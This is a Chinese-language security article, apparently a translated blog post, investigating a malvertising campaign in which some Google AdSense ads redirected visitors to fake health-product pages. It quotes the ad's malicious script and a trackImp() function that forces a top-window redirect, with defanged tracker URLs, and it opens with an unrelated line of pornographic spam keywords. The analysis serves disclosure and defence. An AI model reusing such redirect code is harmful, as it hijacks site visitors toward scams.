压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

　　安全研究人員最近注意到大量的網(wǎng)站被莫名其妙地跳轉(zhuǎn)到某幾個(gè)特定的網(wǎng)站，經(jīng)過調(diào)查，罪魁禍?zhǔn)拙尤皇枪雀鑿V告聯(lián)盟（Google AdSense）。

　　上周末，我們注意到大量站長的網(wǎng)站都被跳轉(zhuǎn)到了某個(gè)“雜志網(wǎng)站”，有些用戶點(diǎn)擊鏈接或者載入新網(wǎng)頁時(shí)會被隨機(jī)地跳轉(zhuǎn)。這些用戶都稱，打開網(wǎng)頁會顯示個(gè)一兩秒，然后就會跳轉(zhuǎn)了。

　　lemode-mgz .com假冒“福布斯”

　　我們對這些網(wǎng)站進(jìn)行了安全檢測，但我們在網(wǎng)站服務(wù)器端沒有找到任何問題。從這些受害網(wǎng)站的癥狀——先載入網(wǎng)頁，幾秒鐘后跳轉(zhuǎn)，表明這些是瀏覽器客戶端方面的重定向。要么是什么JavaScript要么是Meta刷新標(biāo)簽導(dǎo)致的重定向。

　　可是我們在網(wǎng)站上沒有找到能夠修改網(wǎng)頁HTML或者JavaScript的東西，所以重定向應(yīng)該是第三方腳本導(dǎo)致的。

　　谷歌廣告聯(lián)盟惹的禍

　　惡意廣告是一個(gè)麻煩的問題。這些廣告很難追查。因?yàn)閺V告是針對性投放的(廣告商會根據(jù)不同的地理位置、用戶使用的是手機(jī)還是電腦，3G還是Wi-Fi，用戶的瀏覽記錄等投放不同的廣告)，因此不同的用戶會看到不同的廣告，不同的廣告活動活躍時(shí)間也各不相同。

　　另外，廣告腳本往往會加載多個(gè)其他網(wǎng)站的內(nèi)容。例如，我們最近接觸到的一個(gè)網(wǎng)站，它的主頁中包含8個(gè)不同的第三方腳本(包括廣告和網(wǎng)頁小插件)——當(dāng)瀏覽器載入網(wǎng)站時(shí)，那個(gè)網(wǎng)頁會向249個(gè)其他域名上的資源發(fā)送上千個(gè)HTTP請求。可能這是一個(gè)比較極端的例子，但廣告腳本向30-40個(gè)域名發(fā)送請求的情況還是相當(dāng)正常的。

　　盡管如此，我們還是得找到具體問題出在哪里。

　　如果你對惡意廣告的網(wǎng)址進(jìn)行搜索，就會發(fā)現(xiàn)大量討論這些重定向的帖子。

　　搜索這個(gè)重定向地址(lemode-mgz .com)能夠得到很多結(jié)果，在眾多的帖子和博文中，我們找到了這篇谷歌官方廣告聯(lián)盟（Google AdSense）幫助論壇的帖子，帖子中有超過150條信息，記錄了重定向的特點(diǎn)和來源。

　　這種惡意重定向甚至出現(xiàn)在了Google AdSense控制臺的廣告查看中心。這些問題從2014年12月下半旬開始持續(xù)了一個(gè)月，但真正開始大范圍傳播是從2015年1月9日。

　　追蹤惡意廣告

　　帶有AdSense廣告(非文字廣告)的網(wǎng)站會隨機(jī)地將訪客定向到那些“揭開健康秘密”的假冒網(wǎng)站，如：皮膚保養(yǎng)、抗衰老、提高智力還有減肥產(chǎn)品等。這些假冒網(wǎng)站會偽裝成非常知名的(通常是虛構(gòu)的)博客和雜志，例如：《福布斯》、《時(shí)尚好管家》、《醫(yī)生》、《媽咪健康報(bào)》等。他們看起來像是有明星做廣告的，把重大科學(xué)研究成果作為頭條的雜志，還有很多水軍評論稱這些產(chǎn)品很有效。

　　所有的這些假網(wǎng)站都是在lemode-mgz .com、consumernews247 .com和wan-tracker .com的不同子域名下。所有的鏈接都會指向track .securevoluum .com/click，但是如果你直接訪問這些網(wǎng)站，就什么也看不見，只有空白頁。

　　域名都是大概一個(gè)月前注冊的：

　　lemode-mgz .com — 創(chuàng)建于2014-12-14

　　securevoluum .com — 創(chuàng)建于2014-12-15

　　wan-tracker .com — 創(chuàng)建于2014-12-14

　　consumernews247 .com — 創(chuàng)建于2013-09-02 更新于2014-12-24

　　track .securevoluum .com是hfrov .voluumtrk .com的別名，而voluumtrk.com創(chuàng)建于2014-08-06.

　　這些網(wǎng)站的whois信息都是被保護(hù)的，域名都托管在亞馬遜的EC2和S3。

　　查找源頭

　　Google沒有及時(shí)解決問題，站長們坐不住了，他們開始聯(lián)合起來試圖解決問題。解決問題的過程中，他們發(fā)現(xiàn)Google AdSense官網(wǎng)“廣告查看中心”同樣存在重定向現(xiàn)象。如視頻所示，站長們在廣告查看中心看到惡意廣告時(shí)，會被重定向。

　　一位論壇用戶提供的跳轉(zhuǎn)視頻

　　土豆觀看

　　如果站長點(diǎn)擊瀏覽器中的“后退”按鈕，他們就會返回到含有惡意廣告的頁面。但他們手速得要足夠快，才能夠在再次被重定向之前截好圖。

　　僅僅對含有惡意廣告的網(wǎng)頁進(jìn)行截圖是不夠的，因?yàn)槟莻€(gè)網(wǎng)頁還是會包含很多來自不同廣告商的廣告。所以下一步就是要對圖片進(jìn)行裁剪，把單個(gè)的廣告截下來交給廣告查看中心過濾篩選(和Google圖片搜索很類似，它通過你提供的照片尋找那些廣告)。如果篩選出的廣告發(fā)生了重定向跳轉(zhuǎn)，那這個(gè)廣告就應(yīng)該是惡意廣告了。

　　確定劫持方式

　　通過這樣的方式，站長們最終找到了這些了惡意廣告。

　　匿名廣告商adv-2646721236434373，廣告會重定向到adwynn .com。還有Blackburn ART，其廣告指向rgeoffreyblackburn .com。

　　這兩個(gè)賬號都使用正規(guī)的AdWords賬號，廣告看起來也挺正常。我認(rèn)為是騙子通過什么方法劫持了它們——可能是竊取到了他們的用戶名密碼。

　　另一種可能是，騙子們自己創(chuàng)建了這些賬號并偽裝成正規(guī)網(wǎng)站。為了調(diào)查事情真相，我嘗試給adwynn.com域名的持有者發(fā)了郵件，但他們沒有回復(fù)我。直到1月13日，我發(fā)現(xiàn)Google還是沒有屏蔽這兩個(gè)賬號，但他們的廣告不再重定向了，應(yīng)該能夠間接證明這兩個(gè)賬號都是正常賬號。

　　惡意重定向代碼

　　有人做了深度調(diào)查，查明了惡意廣告重定向的工作原理：

　　我覺得我找到了重定向鏈接的源代碼。我查看了adwynne.com廣告的代碼。

　　這是廣告里的腳本元素：

　　<script src="hxxps：//adwynne728us. wan-tracker .com/track-imp/g/bs01/adwynne728us/track.php？it=1420998670014&refurl=https%3A%2F%2Fwww.google.com%2Fadsense%2Fapp%3Fhl%3Den%26subid%3D…skipped…">

　　這段腳本會加載adwynne728us .wan-tracker .com的鏈接，鏈接的內(nèi)容是：

　　function trackImp() { window.top.location.href = 'hxxp：//track .securevoluum .com/421c6fa2-56dc-4806-b48a-6b536e9f021f？account=adwynne&campaign=us&adgroup=1&banner=728-90&it=1420998670014&refurl=https%3A%2F%2Fwww.google.com%2Fadsense%2Fapp%3Fhl%3Den%26subid%3D….skipped…'； } trackImp()；

　　這個(gè)trackImp()函數(shù)會加載一個(gè)track .securevolumm .com的鏈接，又會重定向至此：

　　hxxp：//lemode-mgz .com/sc/10056/special-report.html？voluumdata=vid..00000006-a37f-49df-8000-000000000000__vpid..4728a800-99b3-11e4-8482-3005c6fcc558__caid..421c6fa2-56dc-4806-b48a-6b536e9f021f__lid…skipped…

　　Google為什么默許惡意代碼？

　　我很好奇Google為什么默許這些廣告商使用惡意代碼，例如未授權(quán)的重定向。

　　而事實(shí)上這些廣告在Google審核階段不會有任何的惡意行為，但是一旦通過就開始行為不端了。我認(rèn)為無論如何，應(yīng)該要對這些第三方腳本進(jìn)行控制。腳本可以和瀏覽器exploit配合起來攻擊訪客。如果Google不對這些廣告中的腳本加以控制，AdSense可能最終會變成最大的惡意廣告平臺。

　　這些惡意廣告還可以被用來攻擊那些已經(jīng)登陸的Google Adsense用戶。黑客可以嘗試構(gòu)造CSRF和XSS攻擊，攻擊那些登錄Google賬戶的用戶。